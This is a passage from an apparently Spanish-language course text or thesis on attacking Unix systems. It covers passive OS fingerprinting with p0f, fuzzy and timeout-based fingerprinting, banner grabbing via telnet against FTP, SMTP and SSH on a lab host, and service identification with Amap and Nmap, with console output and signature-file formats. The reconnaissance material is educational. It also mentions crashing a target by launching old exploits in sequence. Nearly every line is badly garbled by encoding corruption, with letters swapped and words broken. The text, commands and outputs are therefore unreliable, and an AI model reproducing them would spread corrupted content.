En la Consola *2 se "uede ver una ejecuci8n e9itosa del una detecci8n ás a"ro9i ada# 'a que se "osee uno o

otor de ?,

Finger"rinting de @ a". En este caso se dan todas las condiciones necesarias "ara ás "uertos abiertos ' cerrados ' la /ir a 'a e9iste en la base. En caso de que no sea tan /avorable# se le "uede "edir que establezca un "orcentaje de c$ances de acertar.

5.*.2. 5etecci8n !asiva
El /inger"rinting "asivo surgi8 allá "or el aBo 2... ' uno de los "ri eros trabajos al res"ecto /ue el del equi"o =one'@et*.*#SF7@PU!A,T. Estas investigaciones co enzaron a notar di/erencias en los encabezados 7! ' FC! de los "aquetes ,K@ de inicio de cone9i8n# su/icientes co o "ara distinguir que "ertenec)an a un ,iste a ?"erativo u otro en "articular. destacadas Aip9on*.-# Fttercap*.1 ' quizás el ás "o"ular# p$=*.5. 5esde entonces# ás surgieron varias $erra ientas que i "le entan esta técnica*.2# siendo las

5ado que los "aquetes ,K@ no requieren est) ulo "revio de ningGn ti"o ;es
*.* ,itio del !ro'ecto =one'net% $tt"%&&"roject.$one'net.org& *.2 =erra ientas !asivas de ?, Finger"rinting% $tt"%&&III.netIor6intrusion.co.u6&os/".$t *.- ,i bien /ue uno de los "ri eros en i "le entar /inger"rinting "asivo# ,i"$on es una $erra ienta 'a en desusoH su 4eb es% $tt"%&&si"$on.datanerds.net *.1 Etterca" es una $erra ienta que "uede utilizarse "ara di/erentes tareas ' ta bién inclu'e un 8dulo "ara $acer /inger"rinting "asivo. 2<:% $tt"%&&etterca".source/orge.net& *.5 ,itio 4eb de !.F% $tt"%&&lca tu/.coredu ".c9&"./.s$t l Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. +2 de 2*.

Ca")tulo 5. ( 5.*.5etecci8n del ,iste a ?"erativo% ?, Finger"rinting

decir# de ninguna $erra ienta># es l8gico su"oner que s-lo escuc9ando D>esni=eando?E por paquetes ANN en la red se puede dilucidar qué A0 ejecuta cada I4 con la que se tiene contacto. 5e a$) surge el no bre de Cpassive fingerprintingD# 'a que si con la técnica anterior ;/inger"rinting activo> era necesario enviarle "aquetes a un $ost "ara evaluar c8 o res"onde# con éste étodo s8lo es necesario "onerse a Cescuc$arD el trá/ico ' co "robar si los "aquetes detectados tienen caracter)sticas es"ec)/icas de un ,? o no. ,in e bargo# está claro que sigue siendo necesaria una base de datos con los fingerprints o C/ir asD conocidas# relacionadas con los "ará etros que los di/erencian. :a docu entaci8n de "./ ' ta bién otras /uentes ;S,ECU4A<T#
SF7@PU!A,T>

coinciden en que las

étricas que caracterizan a los ,?s a este nivel#

' en este caso# son entre otras% Fa aBo Fotal de !aquete 7nicial ;7! _ FC!> Encabezado 7!%
  ●

● ●

FF: 7nicial en el encabezado 7! Bit de C@o Frag entaci8nD 7! Fa aBo Má9i o de ,eg ento FC! ;/SS> ?"ci8n de Escala iento de la Lentana FC! ;%S&4>3>*.J Fi esta " en las ?"ciones de FC!*.+ Fa aBo de Lentana FC! ;%indo. Si$e> ACRs ,electivos !er itida o no ;S4&<>*.O Bits de @o ?"eraci8n FC! ;G?P>

Encabezado FC!%
     

:a secuencia de los "ará etros corres"ondientes a los ca "os o"cionales de FC! ;/SS, S4&<, G?P 1 %S&4>3>. !./ en "articular indica ' al acena en su base de /ir as algo ás de

*.J :a o"ci8n de escala iento de ventanas "er ite de/inir ta aBos de ventana FC! de/inida en el <FC *-2-# "ág. O% $tt"%&&tools.iet/.org&$t l&r/c*-2-c"age(O

a'ores que

los J55-J b'tes que el ca "o %indo. Si$e del encabezado FC! original. Esta o"ci8n está *.+ El ti esta " sirve "ara que un lado de la cone9i8n "ueda calcular el <FF de la cone9i8n# con el /in de descartar seg entos CviejosD du"licados# en un ecanis o lla ado !A4,. Está de/inido ta bién en el <FC *-2-# "ág. *+% $tt"%&&tools.iet/.org&$t l&r/c*-2-c"age(*+ *.O :a o"ci8n ,ACR de FC! está docu entada en el <FC 2.*O% $tt"%&&tools.iet/.org&$t l&r/c2.*O Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. +- de 2*.

Ca")tulo 5. ( 5.*.5etecci8n del ,iste a ?"erativo% ?, Finger"rinting

in/or aci8n que el listado de arriba# co o se "uede ver en la Consola @ro *-. All) lo que se "uede ver es la base de /ir as ,K@# que es la que alguna odalidad tradicional ' la ejores resultados brinda. :a desventaja de esto es que $a' que lograr de anera que el objetivo inicie cone9iones con el equi"o que está ejecutando u' di/)cil.

"./# lo cual segGn las circunstancias# "uede ser

marcelo@saturno:~$ u7o !at ;et!;p0f;p0f.fp N Bingerprint entrE format: N N >>>>:ttt:):ss:444...:HH:4-:)etails N N >>>> - >in7o> iOe 9!an be Q or Snnn or .DD or TDD: N V.nnV 9mu"tip"e of 3..: an7 VTnnV 9mu"tip"e of 3TK: are a""o>e7. N ttt - initia" TT2 N D - 7onJt fragment bit 90 - not et4 1 - et: N - o@era"" ./N pa!6et iOe 9Q 'a a pe!ia" meaning: N OOO - option @a"ue an7 or7er pe!ifi!ation 9@ariab"e- ee be"o>: N RR - quir6 "i t 9@ariab"e- ee be"o>: N O. - O. genre 92inuD4 .o"ari 4 &in7o> : N 7etai" - O. 7e !ription 9(.0.(7 on D)64 et!: ?...@ ----------------- 2inuD ------------------?...@ .+:6+:1:60:3Q4.4T4N4&5:.:2inuD:(.6 9ne>er4 1: .+:6+:1:60:3Q4.4T4N4&6:.:2inuD:(.6 9ne>er4 (: .+:6+:1:60:3Q4.4T4N4&7:.:2inuD:(.6 9ne>er4 3: T+:6+:1:60:3Q4.4T4N4&7:.:2inuD:(.6 9ne>er4 +: ?...@ ----------------- .o"ari ----------------?...@ .3+:6+:1:5(:3Q4N4&04N4N4.:.:.o"ari :10 9beta: 3()50:6+:1:6+:3Q4N4N4T4N4&14N4N4.:.:.o"ari :10 91(03*: 3()50:6+:1:6+:3Q4N4&14N4N4T4N4N4.:.:.o"ari :9.1

Consola *-% Arc$ivo de Finger"rints ,K@ de "./

A "artir de la versi8n 2..# "./ incor"or8

ás /uncionalidad# co o "or

eje "lo la detecci8n de ,?s basado en /inger"rints de "aquetes ,K@_ACRs# de <,F_ ;<,F o <,F_ACR> ' de cone9iones establecidas ;s8lo con ACRs>. Esto "er ite que uno "ueda iniciar cone9iones nor al ente# co o si la Cintenci8nD del usuario /uera ser cliente del servicio que corre en el objetivo# ientras "./ interce"ta el ,K@_ACR e in/or á qué ,? coincide con la /ir a recibida. Algo si ilar sucede en el caso de la detecci8n basada <,F_# salvo que el "uerto del objetivo está cerrado. 5e todas de análisis dis inu'en en buena aneras# las "osibilidades de é9ito con estos ti"os edida ;en el <EA5ME*.0 de "./# secci8n ** el

autor detalla ' co "aran los di/erentes ti"os de análisis>.
*.0 El arc$ivo <EA5ME de la $erra ienta con una descri"ci8n de sus caracter)sticas ' o"ciones de ejecuci8n "uede encontrarse en% $tt"%&&lca tu/.coredu ".c9&"./&<EA5ME Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. +1 de 2*.

Ca")tulo 5. ( 5.*.5etecci8n del ,iste a ?"erativo% ?, Finger"rinting

AGn as)# ' sin i "ortar el ti"o de detecci8n utilizado# lo interesante de esta técnica ' que le a"orta uc$o valor es su capacidad de pasar casi totalmente uestra una odo ,K@ "or desaperci(ida por el 9ost que es anali3ado. En la Consola *1 se ejecuci8n de "./ en un $ost que "osee la 7! *02.*JO...-. en el bastante alta.
?root@ciclon ~@A p0f -i em0 p0f - pa i@e o fingerprinting uti"itE4 @er ion (.0.) 9,: 3. Ua"e> 6i T"!amtufI7ione.!!>4 &. .tearn T> tearn IpoboD.!om> p0f: "i tening 9./N: on Jem0J4 (6( ig 91+ generi!4 !6 um 0B1B5,#(:4 ru"e: Ja""J. 19(.16).0.(:+7706 - 2inuD (.6 9ne>er4 3: 9up: +1 'r : -> 19(.16).0.30:(( 97i tan!e 04 "in6: et'ernet;mo7em: 19(.16).0.(0:(+)09 - OpenC.D 3.0-3.9 9up: 7(67 'r : -> 19(.16).0.30:(( 97i tan!e 04 "in6: et'ernet;mo7em: 19(.16).0.100:10(5 - 2inuD (.( 9(: 9up: 0 'r : -> 19(.16).0.30:(( 97i tan!e 04 "in6: et'ernet;mo7em: 19(.16).0.33:5)061 - KN5NO&N -65535:6+:1:60:31+604N4&34.4T:.:*:*0 9up: 135 'r : -> 19(.16).0.30:)0 9"in6: et'ernet;mo7em: W,PPP <Diting on igna" ( PPP -P0 #@erage pa!6et ratio: 0.65 per minute. ?root@ciclon ~@A

de/ectoH varios $osts se conectaron a di/erentes servicios ' la tasa de é9ito /ue

Consola *1% Eje "lo de ejecuci8n de "./

:as Gnicas di/erencias a"reciables son que la versi8n real de ?"enB,5 era la 1.2 en vez de -.0# ' que la cone9i8n de un FreeB,5 +.. no /ue identi/icada. !ara ningGn cliente $ubo actividad Csos"ec$osaD o di/erente a la nor al.

5.*.-. ?tras técnicas de Finger"rinting
Ade ás de que e9iste so/tIare que co bina detecci8n de un ,iste a ?"erativo re oto de /or a activa ' "asiva# e9isten ta bién otras técnicas% 2in)erprintin) Di=uso% Es una variante que /ue i "le entada en el so/tIare Cpro(e ;versiones * ' 2># desarrollado "or F'odor Karoc$6in# Meder R'd'raliev ' ?/ir Ar6in**.. ,e basa en un /inger"rinting activo# "ero ca bia su algorit o de detecci8n# 'a que involucra coincidencia de =irmas di=usa con el =in de a)re)arle inteli)encia a la detecci-nH es decir# razona con valores en una l8gica di/usa# co o KE,# !<?BAB:KUKE,# !<?BAB:KU@? ' @?.
**. ,itio 4eb de A"robe% $tt"%&&s's(securit'.co &blog&9"robe2& Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. +5 de 2*.

5evuelve resultados

Ca")tulo 5. ( 5.*.5etecci8n del ,iste a ?"erativo% ?, Finger"rinting

"robabil)sticos ' "er ite varias coincidencias si ultáneas# "ero coincide con sus ancestros en que necesita de una base de datos de /ir as ' al enos un "uerto abierto ' un "uerto cerrado en el destino "ara realizar el test en condiciones 8"ti as. :a ventaja de este étodo es que es ás resistente a las condiciones del :os autores ta bién uc$o ás "reciso entorno que "ueden a/ectar a las "ruebas deter inistas# co o "or eje "lo routers# /ireIalls# de oras en el trá/ico# etc.***. a/ir an que env)an enos "aquetes a la red ' que es

que @ a" ' que cualquier otra $erra ienta de detecci8n de ,? re oto.

Detecci-n por Timeouts de T/4GI4% Fa bién lla ado <7@P**2 "or ?livier Courta'# Franc6 Le'sset ' ?livier =een# que "ublicaron un "a"er donde desarrollaron una técnica basada en el cálculo de los ti eouts FC!&7! del $ost ;S<7@PU?,F@PT#S<7@PU?,T> al "rogra adores en qué valores utilizar. :a idea es si "le% s8lo se env)a a un "uerto abierto un Gnico ,K@# ' "osterior ente se contabiliza la cantidad ' la de ora entre los di/erentes ,K@_ACR que env)a el destino tratando de iniciar la cone9i8n. Fa bién se tiene en cuenta la a"arici8n de un <,F luego de algunas res"uestas. 5e esta es el anera se logran identi/icar los di/erentes ,?s# ' lo interesante es que )ni o "osible% un Gnico "aquete. :a desventaja es que en el es bastante di/)cil de detectar# 'a que no es trá/ico CinusualD ' su cantidad C undo realD# es "robable que los tie "os se alteren "or dis"ositivos inter edios ' se obtengan resultados incorrectosH "or otra "arte# es"erar "or ti eouts "uede ser un "roceso u' lento ' tedioso. u' "eligroso ' no tan ás Cnuevo> "or /ronolo)6a de Fxploits% Es un test que "uede ser conocidos en orden coronol8gico ;del o ento de iniciarse la cone9i8n. Esta es otra área donde los <FC dan libertad a los

Gtil a /ines "rácticos. ,i "le ente consiste en enviar al objetivo e9"loits ás CviejoD a /uerza bruta# $asta que el siste a e/ectiva ente caiga. Ka que el e9"loit segura ente está relacionado con una versi8n o versiones bastante es"ec)/icas del ,?# en algunos ; u' raros> casos "uede considerárselo
*** !ara ás docu entaci8n ;"a"ers# "resentaciones# etc.> sobre Finger"rinting 5i/uso# visitar el siguiente enlace% $tt"%&&s's(securit'.co &blog&"ublis$ed( aterials& **2 <7@P% Acr8ni o de :emote 6dentification, Gext @eneration H 7denti/icaci8n <e ota# @ueva Peneraci8n. Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. +J de 2*.

Ca")tulo 5. ( 5.*.5etecci8n del ,iste a ?"erativo% ?, Finger"rinting

co o alternativa.

5.2. Enu eraci8n de ,ervicios
:uego de la eta"a de deter inar el ,iste a ?"erativo re oto# el o(jetivo es poder determinar =e9acientemente qué Ao=t@are está ejecutando el 9ost destino ' cuál está abierto a trá/ico de red# o al al á9i o. :a enu eraci8n# a di/erencia del escaneo de "uertos que se e9"lic8 anterior ente# es una eta"a donde se interactGa directa ente con la ca"a de a"licaci8n en vez de la del ,iste a ?"erativo# a "esar de que esta interacci8n deje inevitable ente rastros. ,in e bargo# 'a que la $acerse "asar "or un cliente etodolog)a ás co Gn es ás del servicio# cualquier 75,# siste a de enos reducir el argen de error

onitoreo# /ireIall# etc. no notará ninguna di/erencia de asiado evidente entre un intruso intentando detectar la versi8n del so/tIare que brinda el servicio con un cliente nor al del is o.

5.2.*. Banner Prabbing
5anner @rabbing))0 es el no bre que se le da a la interacci8n objetivo de obtener la anual# en te9to "lano# del usuario en /or a directa contra el servicio a analizar# con el a'or in/or aci8n "osible. En dic$a cone9i8n general ente el servidor in/or a no bre del servicio o del so/tIare# versi8n ' $asta ca"acidades inclu)das o caracter)sticas inclu)das en tie "o de co "ilaci8n. Esto se ve /acilitado "orque los "rotocolos que se "rogra as cliente relativa ente "recarios# en co andosH "or este anejan actual ente ' ediante son estandares en 7nternet /ueron desarrollados cuando los equi"os ejecutaban odo te9to e interactivos otivo es co Gn que la interacci8n consista en si "les ás adecuados**1 "ara $acer 5anner
ejor

co andos "ara ordenarle al servicio que realice tal o cual tarea. ,i bien $a' "rogra as que son

**- :a traducci8n literal es CCa"tura de FitularesD# aunque a"licado a la técnica una traducci8n "odr)a ser CCa"tura de EncabezadosD. **1 @etcat es

ás adecuado que Felnet "ara $acer este ti"o de cosas# "or as"ectos técnicos ' ás

"orque está casi tan e9tendido co o Felnet. Ler Consola 2. en la "ág. O0 "ara e9a inar un eje "lo# ' este enlace% $tt"%&&en.Ii6i"edia.org&Ii6i&FelnetcCurrentUstatus que contiene in/or aci8n sobre los "roble as de asu ir que Felnet equivale a una cone9i8n CcrudaD ;ra.>. Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. ++ de 2*.

Ca")tulo 5. ( 5.2.Enu eraci8n de ,ervicios

@rabbing# el "rogra a cliente de Felnet ;S47R7UFE:@EFT> es el so/tIare ubicuo "or e9celencia "ara conectarse a cualquier $ost%"uerto FC! e interactuar Ca con el servicio que aloja el server re oto.
marcelo@saturno:~$ te"net 19(.16).0.100 (1 TrEing 19(.16).0.100... ,onne!te7 to t unami. < !ape !'ara!ter i JW0J. ((0 rI62 +2* ser<er !Jersion >u&2.6.0!1" Gon +eb 28 10: 0: 6 C-2 2000" rea7E. F-C/ anonEmou 331 Hue t "ogin o64 en7 Eour !omp"ete e-mai" a77re a pa >or7. *%-- anonIte t.!om (30 Hue t "ogin o64 a!!e re tri!tion app"E. KC7* (1+-T'e fo""o>ing !omman7 are re!ogniOe7 9Q 1>J unimp"emente7:. K.<$ PO$T .TO$ 3.#3Q $NTO N2.T 35D ,DKP ?...@ !sigue" (1+ Dire!t !omment to root@localIost. -8-2 (15 F9IE 2Dpe: 78 -2%2 (11-r'6( BTP er@er tatu : Jersion >u&2.6.0!1" Gon +eb 28 10: 0: 6 C-2 2000 ,onne!te7 to 19(.16).0.( ?...@ !sigue" (11 <n7 of tatu *L) (57 V;V i !urrent 7ire!torE. HFI2 ?...@ sigue ((1 Hoo7bEe. ,onne!tion !"o e7 bE foreign 'o t. marcelo@saturno:~$ te"net 19(.16).0.100 (5 TrEing 19(.16).0.100... ,onne!te7 to t unami. < !ape !'ara!ter i JW0J. ((0 localIost.localdomain C-G2* -endmail 8.9. /8.9. # T'u4 3 #pr (00) 1):(7:53 -0+00 J/+8 root 210 root Mroot@localIost.localdomain' J/+8 a7min 550 a7min... K er un6no>n HFI2 ((1 "o!a"'o t."o!a"7omain !"o ing !onne!tion ,onne!tion !"o e7 bE foreign 'o t. marcelo@saturno:~$ te"net 19(.16).0.30 (( TrEing 19(.16).0.30... ,onne!te7 to !i!"on. < !ape !'ara!ter i JW0J. --K&2.0&4pen--KN..1p1 +ree(-)&20061110 ,onne!tion !"o e7 bE foreign 'o t. marcelo@saturno:~$

anoD

Consola *5% ,esi8n de Banner Prabbing con Felnet

En la Consola *5 se

uestra una si "le sesi8n de 5anner @rabbing.

ediante un cliente telnet !ri ero se "uede a"reciar la in/or aci8n que "ublican los servicios de FF! ' de ,MF! ;res"ectiva ente> del $ost *02.*JO...-.# ' luego
Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. +O de 2*.

Ca")tulo 5. ( 5.2.Enu eraci8n de ,ervicios

se establece una cone9i8n con el servicio de ,,= en el $ost *02.*JO...-.. :o escrito "or el intruso está en negrita# ' la in/or aci8n Gtil está resaltada en color rojo. El $ost Ctsuna iD evidente ente está ejecutando una versi8n <ed =at ;J.2># ' entre otras cosas está de ail es válida en ese servidor o no. u' vieja de u' descuidado% su servidor ,MF! "er ite

la ejecuci8n del co ando L<FK# que contesta ;sin autenticarse> si una direcci8n

5.2.2. Finger"rinting de A"licaciones
E9isten $erra ientas que se orientan a a"licar las técnicas de /inger"rinting activo de ,?s "ero "ara a"licaciones ' servicios es"ec)/icos ;S:?PUMAPUA!!F7@PT# SA<FUA!!F7@PT>. :a ventaja de esta eje "lo%

anera de encarar el

"roble a es que evita "osibles inconvenientes del banner grabbing# co o "or ,i el intruso Cse to"aD con un ad inistrador "recavido# es "robable que $a'a con/igurado el so/tIare "ara que de in/or aci8n# $aciéndolo al usuario.

uestre la

enor cantidad "osible

enos CverborrágicoD ;verbose> e in/or ativo odi/icado el nG ero de "uerto en

Fa bién cabe la "osibilidad que $a'a

el que atiende "eticiones el servicio# utilizando uno di/erente a las convenciones**5 '&o con/iguraciones "or de/ecto. !or eje "lo# un ,ervidor 4eb# que t)"ica ente aguarda "or cone9iones en el "uerto O.# "uede encontrarse en el "uerto O.O..

7ncluso ta bién "udo $aber

odi/icado el no bre de un so/tIare "or

otroH "or eje "lo# $acer que un ,ervidor ,MF! ,end ail O.9 se identi/ique al cliente co o un !ost/i9 2.1.

!or Glti o# $a' "rotocolos que

anejan la in/or aci8n en /or a binaria o

**5 :a

a'or)a de las relaciones C@G ero de !uerto ae ,ervicioD los asigna el 7A@A ;6nternet

4ssigned Gumbers 4ut orit1>H éstas se consideran se i(estándares ;'a que son una reco endaci8n a seguir# no una obligaci8n># de/inida "or un i "ortante ente de 7nternet# que controla los 5@,s ra)z ' las 7!s asignadas# "or eje "lo. !ara ver un listado de los "uertos ' servicios reconocidos "or el 7A@A# ver este enlace% $tt"%&&III.iana.org&assign ents&"ort( nu bers. ,in e bargo# esto no i "ide que se "ueda $acer caso o iso de esta reco endaci8n. !or otro lado# e9isten servicios no enu erados en el listado ' que sin e bargo se conoce qué "uerto utilizan ;aun "roduciéndose colisiones de nG eros de "uerto en algunos casos>. Más in/or aci8n% $tt"%&&en.Ii6i"edia.org&Ii6i&:istUo/UFC!UandU25!U"ortUnu bers Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. +0 de 2*.

Ca")tulo 5. ( 5.2.Enu eraci8n de ,ervicios

encri"tada# con lo cual la interacci8n v)a telnet se $ace casi i "osible. !or estos otivos el /inger"rinting# al compro(ar un comportamiento

t6pico ! conocido de una aplicaci-n% (rinda más se)uridad en los resultados o al menos una instancia adicional para 9acer las compro(aciones previas de un posi(le ataque. 2na de las $erra ientas ás "o"ulares**J ;' que se dedica 8dulo de detecci8n e9clusiva ente a esta labor> es A a"**+# junto ;otra vez> a @ a"# que ade ás del /inger"rinting de ,iste as ?"erativos ta bién cuenta con un de versiones de servicios.

5.2.2.*. A a"
A a" "osee dos arc$ivos de /ir asH uno de triggers ;o Cdis"aradoresD> lla ado Ca""de/s.trigD ' otro de res"uestas conocidas no brado co o Ca""de/s.res"D. El "ri ero corres"onde a secuencias de b'tes o strings ;cadenas de te9to> a enviar a"enas se establece una cone9i8n ;en el caso de FC!>. El segundo "ertenece a las res"uestas de a"licaciones conocidas# ' "ueden estar relacionadas a un trigger o no# 'a que $a' servicios&"rotocolos en donde el servidor env)a un string o un conjunto de b'tes al cliente en "ri era instancia. Es decir# una res"uesta "uede ser generada "or un Cest) uloD en la cone9i8n a"enas iniciada ;el trigger> o recibida in ediata ente sin enviar nada. En la Consola *J se quizás uestra el /or ato de arc$ivo de triggers de A a" uestran triggers de los servicios junto con algunos eje "los. :os "ri eros tres

ás co unes# co o son =FF!# ,MF! ' FF! ' se encuentran en /or ato

ascii ;te9to "lano>. !ara los tres Glti os ;5@, genérico en "uertos FC!&25! ' 5@, Bind**O> es necesario un trigger binario. Con la utilizaci8n de triggers binarios# 'a "uede a"reciarse la ventaja de usar este ti"o de $erra ientas a co "araci8n de telnet o netcat Ca anoD.

**J Enlace con algunos escáneres de a"licaciones% $tt"%&&sectools.org&a""(scanners.$t l **+ ,itio Ieb de A a"% $tt"%&&/reeIorld.t$c.org&t$c(a a"&. =ace algGn tie "o que no se actualiza ni se ven "rogresos en el desarrollo# co o s) sucede con @ a". **O Bind es la i "le entaci8n del so/tIare de servidor ás "o"ular ' $asta "odr)a decirse que de re/erencia del "rotocolo 5@,. 2<:% $tt"%&&III.isc.org&inde9."lY&sI&bind&inde9."$" Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. O. de 2*.

Ca")tulo 5. ( 5.2.Enu eraci8n de ,ervicios
N T'i i t'e trigger fi"e Vapp7ef .trigV for amap N N 2o Trigger tienen e" formato iguiente: N N N#3<:-,O33ONAPO$T4-,O33ONAPO$T4...00:-8PAP$OTO,O20:0F1:T$8HH<$A.T$8NH N N N#3< <" nombre 7e" trigger ?...@ N ,O33ONAPO$T - 9op!iona": e pe!ifi!a en quX puerto e ta ap"i!a!i%n N u ua"mente e en!uentra ?...@ N 8PAP$OTO,O2 - 9op!iona": %"o en@iar e te trigger i e" proto!o"o o N e" puerto obYeti@o e igua" a" proto!o"o 7eifini7o N aquZ4 t!p o u7p. Por 7efe!to on ambo . N ?#$3BK2 .i e te trigger pue7e romper o interrumpir N ap"i!a!ione 4 !onfigure e to en V1V4 ino V0V. N T$8HH<$ 2o 7ato 7e" trigger en Z4 para en@iar a "o puerto . N Pue7e e pe!ifi!ar"o en 7o manera : N 1: Kn tring a !ii en!erra7o entre !omi""a VV4 o N (: Kn tring 'eDa7e!ima" en!abeOa7o por V0DV ?...@ N <Yemp"o : 'ttp-get:)04)14)(4)0004)0)04)0)14)))):t!p:0:VH<T ; ?TTP;1.0[r[n[r[nV mtp:(5:t!p:0:V?<2O #3#P[r[nV ftp:(1:t!p:0:VK.<$ #3#P[r[nV 7n :53:u7p:1:0D00 00 10 00 00 00 00 00 00 00 00 00 7n :53:t!p:1:0D00 0! 00 00 10 00 00 00 00 00 00 00 00 00 7n -bin7:53:u7p:1:0D00 06 01 00 00 01 00 00 00 00 00 00 07 76 65 7( 73 69 6f 6e 0+ 6( 69 6e 6+ 00 00 10 00 03

Consola *J% For ato del arc$ivo de Friggers de A a" ;traducido del inglés>
N T'i i t'e re pon e fi"e Vapp7ef .re pV for amap N N 2a $e pue ta tienen e" iguiente formato: N N N#3<:-T$8HH<$4-T$8HH<$4...00:-8PAP$OTO,O20: -38NA2<NHT?43#GA2<NHT?0:$<.PON.<A$<H<G N N N#3< <" nombre que imprime amap i "a 7efini!i%n !oin!i7e N !on "a re pue ta re!ibi7a 7e" er@i!io N T$8HH<$ 9op!iona": $equiere que "o 7ato re!ibi7o 'aEan i7o N "a re pue ta 7e un trigger !on e te nombre en N app7ef .trig. Pue7e eparar @ario !on una !oma. N 8PAP$OTO,O2 \ 9op!iona": $equiere que "a re pue ta re!ibi7a @enga @Za N e" proto!o"o t!p o u7p. Por 7efe!to on ambo . ?...@ N 2<NHT? 9op!iona": <" mZnimo E m]Dimo "argo 7e "a re pue ta N re!ibi7a4 epara7o por una !oma o un ^ni!o n^mero ?...@ N $<.PON.< < ta e una eDpre i%n regu"ar 7e Per" 9man per"re: que N er] e@a"ua7a en "o 7ato re!ibi7o N <Yemp"o : ?...@ 7n -bin79:7n -bin7:u7p::W...-[D00-[D7e0..........................[D!0 7n -bin7):7n -bin7:u7p::W...-[D00-[D7e0.......................... -W[D!00 7n -7Yb:7n -bin7:u7p::W...-[D)0-[D)30.Q@er ion.bin7 ?...@ 'ttp-apa!'e-1::t!p::W?TTP;.Q[n.er@er: #pa!'e;1 'ttp-apa!'e-(::t!p::W?TTP;.Q[n.er@er: #pa!'e;( ?...@ tftp::u7p::W[D00-[D03[D050[D00

Consola *+% For ato del arc$ivo de <es"uestas de A a" ;traducido del inglés>

:uego# en la Consola *+# se "ueden observar algunas res"uestas reconocidas
Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. O* de 2*.

Ca")tulo 5. ( 5.2.Enu eraci8n de ,ervicios

"or la base de /ir as# co o "or eje "lo las relacionadas con los triggers de 5@, vistos "revia ente# unas res"uestas que t)"ica ente el servidor Ieb A"ac$e devuelve a los clientes ;no relacionado con ningGn trigger># ' una res"uesta a un "aquete 25! enviado a un servidor FFF!. Este arc$ivo de res"uestas conocidas razonable ente e9cede la cantidad de triggers conocidos# 'a que varias res"uestas "ueden estar asociadas a un trigger o a ningunoH lo ideal ser)a que cada res"uesta identi/ique una o varias versiones de iguales o di/erentes servidores. El /unciona iento de A a" es sencillo# ' se "uede resu ir en los siguientes "asos S,A@,UAMA!T% 7. 7nicializaci8n# carga de arc$ivos de triggers# res"uestas# etc. +. ,e reciben# entre otros "ará etros de entrada# $ost destino ' "uertos FC!&25! a analizar. ;. ,e intenta establecer cone9iones en "aralelo con el $ost ' "uerto nor al ente ;siendo con/igurable la cantidad de cone9iones si ultáneas>. <. !or cada cone9i8n iniciada correcta ente se env)a un trigger que no $a'a sido "robado. ,e env)an en orden secuencial# tal co o se encuentran en el arc$ivo de /ir as. . !or cada rece"ci8n correcta de datos# se co "rueba el arc$ivo de res"uestas ' se evalGa si $a' coincidencia o no. #. ,e i "ri en las res"uestas coincidentes.
marcelo@saturno:~/src/amap&1.2$ .;amap -@ 19(.16).0.30 (1(1 (( K ing trigger fi"e .;app7ef .trig ... "oa7e7 35 trigger K ing re pon e fi"e .;app7ef .re p ... "oa7e7 390 re pon e K ing trigger fi"e .;app7ef .rp! ... "oa7e7 +50 trigger amap @5.( 9>>>.t'!.org;t'!-amap: 3#PP8NH mo7e tarte7 at (00)-0+-06 13:51:59 -

Tota" amount of ta 6 to perform in p"ain !onne!t mo7e: 56 *rotocol on 192.168.0. 0:2121/tcp !bD trigger Ittp&get" matcIes 6tp *rotocol on 192.168.0. 0:22/tcp !bD trigger Ittp&get" matcIes ssI *rotocol on 192.168.0. 0:22/tcp !bD trigger Ittp&get" matcIes ssI& openssI &aiting for timeout on 1 !onne!tion ... Kni7entifie7 port : none. amap @5.( fini 'e7 at (00)-0+-06 13:5(:00 marcelo@saturno:~/src/amap&1.2$

Consola *O% Eje "lo de ejecuci8n de A a"# detectando un servicio FF! ' un ?"en,,=

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. O2 de 2*.

Ca")tulo 5. ( 5.2.Enu eraci8n de ,ervicios

Entre otras caracter)sticas# A a" so"orta cone9iones ,,: ;que identi/ica correcta ente "or su ands ake> ' luego env)a los triggers co o si /uera una cone9i8n nor alH de esta anera# todos los triggers son Gtiles "ara cone9iones encri"tadas ta bién. En la Consola *O# A a" "uede identi/icar un servicio FF! a "esar de que esté en un "uerto no estándar ;' que "revia ente se detect8 abierto con un "ort scanning>. !or Glti o es i "ortante notar que los "rotocolos ' servicios que env)an in/or aci8n inicial ;co o un 5anner> coincidirán sie "re con el trigger 9$tt"( getDH esto sucede "orque A a"# a"enas se establece la cone9i8n# env)a el "ri er trigger de la base de /ir as no enviado "revia ente. Esto "uede $acer que un ad inistrador detecte un co "orta iento e9traBo# 'a que en este caso "odr)a ver en los :ogs de co andos FF! ejecutados en el servidor un CPEF & =FF!&*..D# que corres"onde a un "rotocolo =FF!.

5.2.2.2. @ a"
@ a" en este as"ecto no di/iere de asiado en su co "orta iento con el A a"# salvo que su base de /ir as es Gnica ' está co unidad que lo rodea es aGn a costa de a sus usuarios. A lo largo de su ejecuci8n realiza un escaneo de "uertos estándar ;tal co o /ue descri"to en el ca")tulo anterior> '# quedándose con los "uertos abiertos# detecta los servicios de esta anera S@MA!UL,CA@T% ás actualizada ;'a que la a'ores# ejor "a"el teniendo en a'or> ' sus ca"acidades ' "osibilidades son

a'or co "lejidad. Fa bién cu "le un

cuenta el objetivo de "asar desa"ercibido ' brindar

ás in/or aci8n ' /le9ibilidad

7. Establece una cone9i8n con cada "uerto abierto. +. ,i se establece la cone9i8n sin "roble as# @ a" en "ri er lugar co ienza lo que se deno ina el CNull !robeD# que consiste en no enviar nada ' es"erar J segundos con la intenci8n de recibir datos. Aqu) es donde se conte "la a los servicios ' "rotocolos que env)an 5anners o in/or aci8n diversa in ediata ente luego de iniciarse la cone9i8n con el cliente. ;. ,i se reciben datos# se busca en el arc$ivo de /ir as una coincidencia relacionada con este probe.

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. O- de 2*.

Ca")tulo 5. ( 5.2.Enu eraci8n de ,ervicios

;.7.,i

